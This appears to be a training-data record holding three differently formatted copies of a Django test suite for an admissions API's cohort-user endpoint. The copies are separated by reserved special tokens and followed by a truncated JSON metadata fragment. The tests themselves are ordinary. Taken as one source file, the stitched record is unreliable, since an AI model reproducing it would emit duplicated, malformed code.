        model = self.generate_models(authenticate=True, cohort=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': 999})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'invalid user_id'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_id(self):
        """PUT for a user with no CohortUser record responds 400 'Specified cohort not be found'."""
        model = self.generate_models(authenticate=True, cohort=True, user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id_but_without_user(self):
        """PUT without an explicit user kwarg still responds 400 (no CohortUser exists)."""
        # NOTE(review): model.user is referenced although user=True is not
        # passed here — presumably authenticate=True creates it; confirm
        # against the AdmissionsTestCase mixin.
        model = self.generate_models(authenticate=True, cohort=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id_but_with_user(self):
        """PUT with cohort and user generated but no CohortUser relation responds 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id(self):
        """PUT with a complete CohortUser responds 200 and leaves the stored row unchanged."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, specialty_mode=True, profile_academy=True, cohort_user=True)
        # Snapshot the persisted CohortUser before the request to prove the
        # PUT does not mutate it.
        model_dict = self.get_cohort_user_dict(1)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'id': model.cohort_user.id, 'role': model.cohort_user.
            role, 'educational_status': model.cohort_user.
            educational_status, 'finantial_status': model.cohort_user.
            finantial_status}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(self.count_cohort_user(), 1)
        self.assertEqual(self.get_cohort_user_dict(1), model_dict)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):
        """DELETE with a non-existent user id responds 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, specialty_mode=True, profile_academy=True, cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': 9999})
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):
        """DELETE with a non-existent cohort id responds 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, specialty_mode=True, profile_academy=True, cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': 9999, 'user_id': model.user.id})
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id(self):
        """DELETE with valid ids removes the CohortUser and responds 204."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, specialty_mode=True, profile_academy=True, cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
        self.assertEqual(self.count_cohort_user(), 0)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_unsuccess_task(self):
        """PUT educational_status=GRADUATED while a PENDING project task exists responds 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, profile_academy=True, cohort_user=True, task=True,
            task_status='PENDING', task_type='PROJECT')
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {'educational_status': 'GRADUATED'}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'User has tasks with status pending the educational status cannot be GRADUATED'
            }
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
        """PUT to GRADUATED while finantial_status is LATE responds 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, profile_academy=True, cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'Cannot be marked as `GRADUATED` if its financial status is `LATE`'
            }
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import re
from unittest.mock import patch
from django.urls.base import reverse_lazy
from rest_framework import status
from breathecode.tests.mocks import GOOGLE_CLOUD_PATH, apply_google_cloud_client_mock, apply_google_cloud_bucket_mock, apply_google_cloud_blob_mock
from ..mixins import AdmissionsTestCase
class CohortIdUserIdTestSuite(AdmissionsTestCase):
    """Test /cohort/:id/user/:id — GET auth handling, PUT updates and DELETE removal."""

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_without_auth(self):
        """GET /cohort/:id/user/:id without credentials returns 401."""
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': 1, 'user_id': 1})
        response = self.client.get(url)
        json = response.json()
        self.assertEqual(json, {'detail':
            'Authentication credentials were not provided.', 'status_code':
            status.HTTP_401_UNAUTHORIZED})
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_cohort_id(self):
        """PUT with a cohort_id that does not exist returns 400 (invalid cohort_id)."""
        model = self.generate_models(authenticate=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': 1, 'user_id': 1})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_user_id(self):
        """PUT with a user_id that does not exist returns 400 (invalid user_id)."""
        model = self.generate_models(authenticate=True, cohort=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': 999})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'invalid user_id'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_id(self):
        """PUT with an existing cohort and user but no CohortUser relation returns 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id_but_without_user(self):
        """PUT with a cohort but no explicit user model still returns 400 (no CohortUser)."""
        model = self.generate_models(authenticate=True, cohort=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id_but_with_user(self):
        """PUT with cohort and user present but no CohortUser record returns 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id(self):
        """PUT with a valid CohortUser succeeds (200) and leaves the stored row unchanged."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, specialty_mode=True, profile_academy=True, cohort_user=True)
        # Snapshot the row before the request to assert it is not mutated.
        model_dict = self.get_cohort_user_dict(1)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'id': model.cohort_user.id, 'role': model.cohort_user.
            role, 'educational_status': model.cohort_user.
            educational_status, 'finantial_status': model.cohort_user.
            finantial_status}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(self.count_cohort_user(), 1)
        self.assertEqual(self.get_cohort_user_dict(1), model_dict)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):
        """DELETE with a user_id that does not exist returns 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, specialty_mode=True, profile_academy=True, cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': 9999})
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):
        """DELETE with a cohort_id that does not exist returns 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, specialty_mode=True, profile_academy=True, cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': 9999, 'user_id': model.user.id})
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id(self):
        """DELETE with a valid CohortUser removes it (204, zero rows remain)."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, specialty_mode=True, profile_academy=True, cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
        self.assertEqual(self.count_cohort_user(), 0)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_unsuccess_task(self):
        """PUT cannot set GRADUATED while the user has a PENDING project task."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, profile_academy=True, cohort_user=True, task=True,
            task_status='PENDING', task_type='PROJECT')
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {'educational_status': 'GRADUATED'}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'User has tasks with status pending the educational status cannot be GRADUATED'
        }
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
        """PUT cannot set GRADUATED while the finantial status is LATE."""
        model = self.generate_models(authenticate=True, cohort=True, user=
            True, profile_academy=True, cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': model.cohort.id, 'user_id': model.user.id})
        data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail':
            'Cannot be marked as `GRADUATED` if its financial status is `LATE`'
        }
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_1|>
"""
Test /cohort/:id/user/:id
"""
import re
from unittest.mock import patch
from django.urls.base import reverse_lazy
from rest_framework import status
from breathecode.tests.mocks import (
GOOGLE_CLOUD_PATH,
apply_google_cloud_client_mock,
apply_google_cloud_bucket_mock,
apply_google_cloud_blob_mock,
)
from ..mixins import AdmissionsTestCase
class CohortIdUserIdTestSuite(AdmissionsTestCase):
    """Test /cohort/:id/user/:id — GET auth handling, PUT updates and DELETE removal."""

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_without_auth(self):
        """GET /cohort/:id/user/:id without credentials returns 401."""
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={'cohort_id': 1, 'user_id': 1})
        response = self.client.get(url)
        json = response.json()
        self.assertEqual(
            json, {
                'detail': 'Authentication credentials were not provided.',
                'status_code': status.HTTP_401_UNAUTHORIZED
            })
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_cohort_id(self):
        """PUT with a cohort_id that does not exist returns 400 (invalid cohort_id)."""
        model = self.generate_models(authenticate=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={'cohort_id': 1, 'user_id': 1})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_user_id(self):
        """PUT with a user_id that does not exist returns 400 (invalid user_id)."""
        model = self.generate_models(authenticate=True, cohort=True)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': 999
                           })
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'invalid user_id'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_id(self):
        """PUT with an existing cohort and user but no CohortUser relation returns 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=True)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': model.user.id
                           })
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id_but_without_user(self):
        """PUT with a cohort but no explicit user model still returns 400 (no CohortUser)."""
        model = self.generate_models(authenticate=True, cohort=True)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': model.user.id
                           })
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id_but_with_user(self):
        """PUT with cohort and user present but no CohortUser record returns 400."""
        model = self.generate_models(authenticate=True, cohort=True, user=True)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': model.user.id
                           })
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_id(self):
        """PUT with a valid CohortUser succeeds (200) and leaves the stored row unchanged."""
        model = self.generate_models(authenticate=True,
                                     cohort=True,
                                     user=True,
                                     specialty_mode=True,
                                     profile_academy=True,
                                     cohort_user=True)
        # Snapshot the row before the request to assert it is not mutated.
        model_dict = self.get_cohort_user_dict(1)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': model.user.id
                           })
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.put(url, data)
        json = response.json()
        expected = {
            'id': model.cohort_user.id,
            'role': model.cohort_user.role,
            'educational_status': model.cohort_user.educational_status,
            'finantial_status': model.cohort_user.finantial_status,
        }
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(self.count_cohort_user(), 1)
        self.assertEqual(self.get_cohort_user_dict(1), model_dict)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):
        """DELETE with a user_id that does not exist returns 400."""
        model = self.generate_models(authenticate=True,
                                     cohort=True,
                                     user=True,
                                     specialty_mode=True,
                                     profile_academy=True,
                                     cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': 9999
                           })
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):
        """DELETE with a cohort_id that does not exist returns 400."""
        model = self.generate_models(authenticate=True,
                                     cohort=True,
                                     user=True,
                                     specialty_mode=True,
                                     profile_academy=True,
                                     cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': 9999,
                               'user_id': model.user.id
                           })
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_delete_with_id(self):
        """DELETE with a valid CohortUser removes it (204, zero rows remain)."""
        model = self.generate_models(authenticate=True,
                                     cohort=True,
                                     user=True,
                                     specialty_mode=True,
                                     profile_academy=True,
                                     cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': model.user.id
                           })
        data = {'specialty_mode': model.specialty_mode.id}
        response = self.client.delete(url, data)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
        self.assertEqual(self.count_cohort_user(), 0)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_unsuccess_task(self):
        """PUT cannot set GRADUATED while the user has a PENDING project task."""
        model = self.generate_models(authenticate=True,
                                     cohort=True,
                                     user=True,
                                     profile_academy=True,
                                     cohort_user=True,
                                     task=True,
                                     task_status='PENDING',
                                     task_type='PROJECT')
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': model.user.id
                           })
        data = {
            'educational_status': 'GRADUATED',
        }
        response = self.client.put(url, data)
        json = response.json()
        expected = {
            'status_code': 400,
            'detail': 'User has tasks with status pending the educational status cannot be GRADUATED',
        }
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
        """PUT cannot set GRADUATED while the finantial status is LATE."""
        model = self.generate_models(authenticate=True,
                                     cohort=True,
                                     user=True,
                                     profile_academy=True,
                                     cohort_user=True)
        url = reverse_lazy('admissions:cohort_id_user_id',
                           kwargs={
                               'cohort_id': model.cohort.id,
                               'user_id': model.user.id
                           })
        data = {
            'educational_status': 'GRADUATED',
            'finantial_status': 'LATE',
        }
        response = self.client.put(url, data)
        json = response.json()
        expected = {
            'status_code': 400,
            'detail': 'Cannot be marked as `GRADUATED` if its financial status is `LATE`',
        }
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
|
flexible
|
{
"blob_id": "937711546271c145d0f0df2981bdd7d1e9297e3a",
"index": 3788,
